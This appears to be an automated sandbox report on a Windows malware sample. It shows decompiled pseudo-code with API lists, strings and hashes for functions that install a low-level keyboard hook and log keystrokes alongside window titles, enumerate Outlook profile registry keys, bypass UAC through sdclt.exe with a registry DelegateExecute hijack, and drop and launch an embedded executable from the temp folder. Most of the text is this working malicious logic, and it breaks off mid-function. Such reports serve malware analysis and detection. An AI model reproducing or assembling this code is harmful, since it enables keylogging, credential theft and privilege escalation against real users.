                                  					_t131 = _v748.pt;
                                  					_t154 = _t131;
                                  					if(_t131 != 0) {
                                  						E00401B27(_t131, _t131);
                                  					}
                                  				}
                                  				_t132 = 4;
                                  				_t143 = E004035B9( &_v808, _t132, _t154);
                                  				E00403447(E0040357C( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
                                  				E00405FEB(_v816);
                                  				_t65 =  *0x42675c; // 0x0
                                  				_v816 = 0;
                                  				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
                                  					GetLocalTime( &_v804);
                                  					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
                                  					_t122 =  *0x42675c; // 0x0
                                  					_t150 = _t150 + 0x20;
                                  					_t26 = _t122 + 0x10; // 0x10
                                  					E0040357C(E0040357C(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
                                  					_t94 =  *0x42675c; // 0x0
                                  					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                  					_t125 =  *0x42675c; // 0x0
                                  					 *(_t125 + 4) = _t95;
                                  					CloseHandle(_t95);
                                  				}
                                  				_v788.lpszClassName = _v812;
                                  				_v788.lpfnWndProc = E00408793;
                                  				_v788.hInstance = _t111;
                                  				RegisterClassW( &_v788);
                                  				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
                                  				_t119 = 7;
                                  				_t112 = _t69;
                                  				memset( &_v748, 0, _t119 << 2);
                                  				_t73 = GetMessageA( &_v748, _t112, 0, 0);
                                  				if(_t73 == 0) {
                                  					L9:
                                  					_t144 = _v748.wParam;
                                  					goto L10;
                                  				} else {
                                  					_t144 = _t143 | 0xffffffff;
                                  					while(_t73 != _t144) {
                                  						TranslateMessage( &_v748);
                                  						DispatchMessageA( &_v748);
                                  						_t73 = GetMessageA( &_v748, _t112, 0, 0);
                                  						if(_t73 != 0) {
                                  							continue;
                                  						}
                                  						goto L9;
                                  					}
                                  					L10:
                                  					E00405FEB(_v812);
                                  					return _t144;
                                  				}
			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00408D21
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408D90
                                  • lstrcatW.KERNEL32 ref: 00408DAA
                                  • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00408DB6
                                  • lstrcpyW.KERNEL32(?,-00000010), ref: 00408DF0
                                  • lstrcatW.KERNEL32 ref: 00408E03
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00411446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                  • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408E86
                                  • wsprintfW.USER32 ref: 00408EBD
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408EFF
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F0F
                                  • RegisterClassW.USER32 ref: 00408F2E
                                  • CreateWindowExW.USER32 ref: 00408F46
                                  • GetMessageA.USER32 ref: 00408F67
                                  • TranslateMessage.USER32 ref: 00408F79
                                  • DispatchMessageA.USER32 ref: 00408F84
                                  • GetMessageA.USER32 ref: 00408F94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                  • API String ID: 2678186124-2372768292
                                  • Opcode ID: e8fe0edbe75c1bf9ffff53e5edc91f27ce3bf57788baf6ddfe9d2ea03ef54f84
                                  • Instruction ID: 5c496a3f65fd177ded775e206ced170c84e42a303c2806b3eceb831f6cf01448
                                  • Opcode Fuzzy Hash: e8fe0edbe75c1bf9ffff53e5edc91f27ce3bf57788baf6ddfe9d2ea03ef54f84
                                  • Instruction Fuzzy Hash: 51718172604304ABC320DBA5DC45EABB7FCEB89704F00492EF685E3291DB39D945CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040983D(intOrPtr __ecx, void* __edx, void* __eflags) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				intOrPtr _v20;
                                  				short _v4116;
                                  				short _v8212;
                                  				short _v12308;
                                  				long _t68;
                                  				int _t74;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				short* _t80;
                                  
                                  				_t76 = __edx;
                                  				_t75 = __ecx;
                                  				E004011C0(0x3014, __ecx);
                                  				_v20 = _t75;
                                  				_t74 = 0;
                                  				E00401052( &_v4116, 0, 0x800);
                                  				E00401052( &_v8212, 0, 0x800);
                                  				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
                                  					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                  					if(__eflags != 0) {
                                  						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                  						if(__eflags != 0) {
                                  							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
                                  							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
                                  							if(__eflags != 0) {
                                  								L15:
                                  								__eflags = 0;
                                  								return 0;
                                  							}
                                  							_push(_t80);
                                  							L8:
                                  							lstrcpyW( &_v4116, ??);
                                  							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
                                  								goto L15;
                                  							}
                                  							if(_v16 <= _t74) {
                                  								L14:
                                  								return 1;
                                  							} else {
                                  								goto L10;
                                  							}
                                  							while(1) {
                                  								L10:
                                  								_v12 = 0x800;
                                  								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
                                  									goto L15;
                                  								}
                                  								RegCloseKey(_v8);
                                  								lstrcpyW( &_v8212,  &_v4116);
                                  								lstrcatW( &_v8212, "\\");
                                  								lstrcatW( &_v8212,  &_v12308);
                                  								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
                                  								_t90 = _t68;
                                  								if(_t68 != 0) {
                                  									goto L15;
                                  								}
                                  								_push(_t75);
                                  								_t75 = _v20;
                                  								E004099FF(_t75, _t76, _t90, _v8);
                                  								RegCloseKey(_v8);
                                  								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
                                  									goto L15;
                                  								}
                                  								_t74 = _t74 + 1;
                                  								if(_t74 < _v16) {
                                  									continue;
                                  								}
                                  								goto L14;
                                  							}
                                  							goto L15;
                                  						}
                                  						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
                                  						goto L8;
                                  					}
                                  					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                  					goto L8;
                                  				}
                                  				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                  				goto L8;
                                  			}

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00409894
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004098B1
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00409904
                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040991A
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040994D
                                  • RegCloseKey.ADVAPI32(?), ref: 0040995E
                                  • lstrcpyW.KERNEL32(?,?), ref: 00409972
                                  • lstrcatW.KERNEL32 ref: 00409980
                                  • lstrcatW.KERNEL32 ref: 00409994
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099B1
                                  • RegCloseKey.ADVAPI32(?,?), ref: 004099C6
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099E3
                                  Strings
                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                  • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                  • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                  • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                  • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                  • API String ID: 1891545080-2020977430
                                  • Opcode ID: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction ID: b767e8cf4ef787b214c4ffa932510dbda8161c68e187407f9f6ec9346f9c833f
                                  • Opcode Fuzzy Hash: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction Fuzzy Hash: E1411EB290021DBEEB20DA91CC85EFB777CEF05384F1005BAB515F2151E6789E85ABA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0041313A(void* __edx, void* __eflags) {
                                  				void* _v8;
                                  				char _v12;
                                  				struct _SHELLEXECUTEINFOW _v72;
                                  				short _v592;
                                  				char _v1616;
                                  				short* _t53;
                                  
                                  				if(E0041111B() != 1) {
                                  					CloseHandle( *0x559cb0);
                                  					_v8 = 0;
                                  					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
                                  					if(_v8 != 0) {
                                  						_t47 =  &_v12;
                                  						E00410CFF( &_v12);
                                  					}
                                  					E00412E91();
                                  					E00401052( &_v1616, 0, 0x400);
                                  					GetModuleFileNameA(0,  &_v1616, 0x400);
                                  					E00412E2C(_t47, 0x418fe6,  &_v1616);
                                  					E00412E2C(_t47, "DelegateExecute", 0x418fe6);
                                  					GetSystemDirectoryW( &_v592, 0x104);
                                  					lstrcatW( &_v592, L"\\sdclt.exe");
                                  					_t53 = L"open";
                                  					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
                                  					asm("movaps xmm0, [0x41a900]");
                                  					_v72.lpFile =  &_v592;
                                  					_v72.cbSize = 0x3c;
                                  					_v72.fMask = 0x40;
                                  					_v72.hwnd = 0;
                                  					_v72.lpVerb = _t53;
                                  					asm("movups [ebp-0x30], xmm0");
                                  					ShellExecuteExW( &_v72);
                                  					TerminateProcess(_v72.hProcess, 0);
                                  					if(_v8 != 0) {
                                  						E00410CD8( &_v12);
                                  					}
                                  					Sleep(0x7d0);
                                  					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
                                  					ExitProcess(0);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00413159
                                  • GetCurrentProcess.KERNEL32(?), ref: 00413168
                                  • IsWow64Process.KERNEL32(00000000), ref: 0041316F
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 004131A6
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004131D8
                                  • lstrcatW.KERNEL32 ref: 004131EA
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413202
                                  • ShellExecuteExW.SHELL32(?), ref: 00413234
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041323E
                                  • Sleep.KERNEL32(000007D0), ref: 00413256
                                  • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00413266
                                  • ExitProcess.KERNEL32 ref: 0041326D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseCurrentExecuteHandleShellToken$DeleteDirectoryExitFileInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                  • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                  • API String ID: 3164795406-2081737068
                                  • Opcode ID: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction ID: 1975b8516974a034e8a1e4695efa9b733e37ae44b87f84d9a85a70a28b88c4fa
                                  • Opcode Fuzzy Hash: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction Fuzzy Hash: 5931AE71C42118BBCB10AFA0DC48EDEBB7CEF44315F1040AAF909E2250D7785A95CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00415169(void* __ecx, void* __eflags, long _a4) {
                                  				intOrPtr* _v8;
                                  				long _v12;
                                  				struct _SHELLEXECUTEINFOA _v72;
                                  				char _v1096;
                                  				char _v2120;
                                  				char _v3144;
                                  				void* _t38;
                                  				void* _t40;
                                  				void* _t83;
                                  
                                  				_t75 =  *_a4;
                                  				_t68 = __ecx + 4;
                                  				_v8 = __ecx + 4;
                                  				E00403549(_t68, E00413441( *_a4 + 4,  *_t75));
                                  				E00405FEB(_a4);
                                  				_t38 = LoadResource(0, _a4);
                                  				_a4 = SizeofResource(0, _a4);
                                  				_t40 = LockResource(_t38);
                                  				E00401052( &_v1096, 0, 0x400);
                                  				E00401052( &_v2120, 0, 0x400);
                                  				GetTempPathA(0x400,  &_v1096);
                                  				lstrcatA( &_v1096, "find.exe");
                                  				GetTempPathA(0x400,  &_v2120);
                                  				lstrcatA( &_v2120, "find.db");
                                  				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                  				WriteFile(_t83, _t40, _a4,  &_v12, 0);
                                  				CloseHandle(_t83);
                                  				E00401052( &_v3144, 0, 0x400);
                                  				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                  				_v72.cbSize = 0x3c;
                                  				_v72.lpFile =  &_v1096;
                                  				_v72.fMask = 0x40;
                                  				asm("xorps xmm0, xmm0");
                                  				_v72.lpParameters =  &_v3144;
                                  				asm("movlpd [ebp-0x20], xmm0");
                                  				asm("movlpd [ebp-0x18], xmm0");
                                  				asm("movlpd [ebp-0x10], xmm0");
                                  				_v72.hwnd = 0;
                                  				_v72.lpVerb = 0;
                                  				_v72.lpDirectory = 0;
                                  				_v72.nShow = 0;
                                  				_v72.hInstApp = 0;
                                  				return ShellExecuteExA( &_v72);
                                  			}

                                  APIs
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • LoadResource.KERNEL32(00000000,?,00000000), ref: 004151A4
                                  • SizeofResource.KERNEL32(00000000,?), ref: 004151B0
                                  • LockResource.KERNEL32(00000000), ref: 004151BA
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 004151F4
                                  • lstrcatA.KERNEL32(?,find.exe), ref: 00415208
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 00415216
                                  • lstrcatA.KERNEL32(?,find.db), ref: 00415224
                                  • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0041523F
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00415251
                                  • CloseHandle.KERNEL32(00000000), ref: 00415258
                                  • wsprintfA.USER32 ref: 00415288
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 004152D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                  • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                  • API String ID: 2504251837-265381321
                                  • Opcode ID: ea5cf1ea91d2c40a25a976611a3c9f78221addc3422e44743eda63b5f05cf4dc
                                  • Instruction ID: a64ecab57c3cf55662885f0afd46cea5e91dac6a4cbb1ef5118ba8298ebcf816
                                  • Opcode Fuzzy Hash: ea5cf1ea91d2c40a25a976611a3c9f78221addc3422e44743eda63b5f05cf4dc
                                  • Instruction Fuzzy Hash: C7411FB190021DABDB10DFA5DD85EDEBBBCFF89304F108166F609A2150DB749A858FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00407F94(void* __edx, void* __eflags) {
                                  				short _v176;
                                  				struct tagMSG _v204;
                                  				void* _v208;
                                  				struct _SYSTEMTIME _v228;
                                  				struct HINSTANCE__* _t19;
                                  				intOrPtr _t22;
                                  				intOrPtr _t25;
                                  				intOrPtr _t27;
                                  				intOrPtr _t40;
                                  				intOrPtr _t45;
                                  				void* _t46;
                                  				void* _t49;
                                  				intOrPtr* _t50;
                                  				void* _t59;
                                  				struct HINSTANCE__* _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				intOrPtr _t66;
                                  				void* _t68;
                                  				void* _t71;
                                  				void* _t75;
                                  				void* _t79;
                                  				void* _t90;
                                  
                                  				_t90 = __eflags;
                                  				_t71 = __edx;
                                  				_t19 = GetModuleHandleA(0);
                                  				_t62 =  *0x42675c; // 0x0
                                  				_t60 = _t19;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				E00401052(_t62 + 0x210, 0, 0x800);
                                  				_t22 =  *0x42675c; // 0x0
                                  				E00401052(_t22 + 0x10, 0, 0x208);
                                  				_t25 =  *0x42675c; // 0x0
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
                                  				_t27 =  *0x42675c; // 0x0
                                  				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
                                  				GetLocalTime( &_v228);
                                  				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
                                  				_t40 =  *0x42675c; // 0x0
                                  				lstrcatW(_t40 + 0x10,  &_v176);
                                  				_t64 =  *0x42675c; // 0x0
                                  				_t11 = _t64 + 0x10; // 0x10
                                  				E00403411(_t64 + 0xc, _t71, _t11);
                                  				_t45 =  *0x42675c; // 0x0
                                  				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                  				_t66 =  *0x42675c; // 0x0
                                  				 *(_t66 + 4) = _t46;
                                  				CloseHandle(_t46);
                                  				_v228.wYear = 0;
                                  				_t68 = E004134A2("c:\\windows\\system32\\user32.dll",  &_v228);
                                  				_t49 = E00411EF1(_t68, 0, _t90);
                                  				_t91 = _t49;
                                  				if(_t49 == 0) {
                                  					_t50 =  *0x426758; // 0x0
                                  				} else {
                                  					_push(_t68);
                                  					_t50 = E00411E88(_t49, "SetWindowsHookExA", _t91);
                                  					 *0x426758 = _t50;
                                  				}
                                  				 *_t50(0xd, E00408125, _t60, 0);
                                  				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
                                  					TranslateMessage( &_v204);
                                  					DispatchMessageA( &_v204);
                                  				}
                                  				return 0;
                                  			}

                                  0x00407f94
                                  0x00407f94
                                  0x00407fa5
                                  0x00407fab
                                  0x00407fb5
                                  0x00407fbf
                                  0x00407fc5
                                  0x00407fc6
                                  0x00407fc7
                                  0x00407fcc
                                  0x00407fd1
                                  0x00407fe3
                                  0x00407fe8
                                  0x00407ff9
                                  0x00407fff
                                  0x00408013
                                  0x0040801a
                                  0x0040804e
                                  0x0040805c
                                  0x00408065
                                  0x00408067
                                  0x0040806d
                                  0x00408074
                                  0x00408079
                                  0x00408091
                                  0x00408097
                                  0x0040809e
                                  0x004080a1
                                  0x004080ab
                                  0x004080bb
                                  0x004080bd
                                  0x004080c2
                                  0x004080c4
                                  0x004080db
                                  0x004080c6
                                  0x004080c6
                                  0x004080ce
                                  0x004080d4
                                  0x004080d4
                                  0x004080e9
                                  0x0040810c
                                  0x004080fb
                                  0x00408106
                                  0x00408106
                                  0x00408122

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00407FA5
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00407FF9
                                  • lstrcatW.KERNEL32 ref: 00408013
                                  • GetLocalTime.KERNEL32(?), ref: 0040801A
                                  • wsprintfW.USER32 ref: 0040804E
                                  • lstrcatW.KERNEL32 ref: 00408065
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408091
                                  • CloseHandle.KERNEL32(00000000), ref: 004080A1
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00411EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,7671826E,00000000,?,?,?,?,004080C2), ref: 00411F1D
                                  • GetMessageA.USER32 ref: 00408114
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • TranslateMessage.USER32 ref: 004080FB
                                  • DispatchMessageA.USER32 ref: 00408106
                                  Strings
                                  • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408048
                                  • SetWindowsHookExA, xrefs: 004080C7
                                  • c:\windows\system32\user32.dll, xrefs: 004080AF
                                  • \Microsoft Vision\, xrefs: 0040800D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                  • API String ID: 1431388325-3884914687
                                  • Opcode ID: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction ID: 6c2511fb03697e5af89a4dd955d9eabc72836af2c0e76f94d97bcee5e6e5c3d3
                                  • Opcode Fuzzy Hash: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction Fuzzy Hash: 15418271604300ABD3209BA9EC49FAB77ECEBC8748F00486EFA45D3291DA79D945C769

                                  C-Code - Quality: 100%
                                  			E004085CB(void* __ecx, void* __edx, void* __eflags) {
                                  				struct _SECURITY_ATTRIBUTES* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				short _v536;
                                  				int _t35;
                                  				intOrPtr _t37;
                                  				int _t39;
                                  				intOrPtr _t40;
                                  				WCHAR* _t41;
                                  				intOrPtr _t43;
                                  				void* _t44;
                                  				int _t46;
                                  				intOrPtr _t48;
                                  				intOrPtr _t50;
                                  				long _t54;
                                  				intOrPtr _t55;
                                  				intOrPtr _t57;
                                  				void* _t59;
                                  				intOrPtr _t61;
                                  				intOrPtr _t63;
                                  				long _t65;
                                  				intOrPtr _t66;
                                  				void* _t70;
                                  				void* _t73;
                                  				intOrPtr _t83;
                                  				void* _t94;
                                  				void* _t97;
                                  				void* _t98;
                                  				void* _t100;
                                  
                                  				_t94 = __edx;
                                  				_v16 = __ecx;
                                  				E00401052( &_v536, 0, 0x208);
                                  				_v8 = 0;
                                  				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
                                  				_t106 = _t35;
                                  				if(_t35 <= 0) {
                                  					E00403411( &_v8, _t94, L"{Unknown}");
                                  				} else {
                                  					_t73 = E004036F7( &_v12,  &_v536);
                                  					E00403447(E0040357C( &_v8, _t94, _t106, "{"), _t106, _t73);
                                  					E0040357C(_t74, _t94, _t106, "}");
                                  					E00405FEB(_v12);
                                  					_v12 = 0;
                                  				}
                                  				_t37 =  *0x42675c; // 0x0
                                  				_t39 = lstrlenW(_t37 + 0x210);
                                  				_t40 =  *0x42675c; // 0x0
                                  				if(_t39 == 0) {
                                  					L6:
                                  					_t41 = _t40 + 0x210;
                                  					__eflags = _t41;
                                  					lstrcpyW(_t41, _v8);
                                  					_t43 =  *0x42675c; // 0x0
                                  					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
                                  				} else {
                                  					_t70 = E0040335A( &_v8, E004036F7( &_v12, _t40 + 0x210));
                                  					E00405FEB(_v12);
                                  					_t40 =  *0x42675c; // 0x0
                                  					_v12 = 0;
                                  					if(_t70 == 0) {
                                  						goto L6;
                                  					} else {
                                  						 *(_t40 + 0xa10) = 1;
                                  					}
                                  				}
                                  				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
                                  				_t83 =  *0x42675c; // 0x0
                                  				 *(_t83 + 4) = _t44;
                                  				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
                                  					_t21 = _t83 + 8; // 0x8
                                  					_t98 = L"\r\n";
                                  					_t54 = lstrlenW(_t98);
                                  					_t55 =  *0x42675c; // 0x0
                                  					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
                                  					_t57 =  *0x42675c; // 0x0
                                  					_t59 = E00403373( &_v8);
                                  					_t61 =  *0x42675c; // 0x0
                                  					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
                                  					_t63 =  *0x42675c; // 0x0
                                  					_t100 = L"\r\n";
                                  					_t65 = lstrlenW(_t100);
                                  					_t66 =  *0x42675c; // 0x0
                                  					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
                                  					_t83 =  *0x42675c; // 0x0
                                  				}
                                  				_t97 = _v16;
                                  				_t28 = _t83 + 8; // 0x8
                                  				_t46 = lstrlenW(_t97);
                                  				_t48 =  *0x42675c; // 0x0
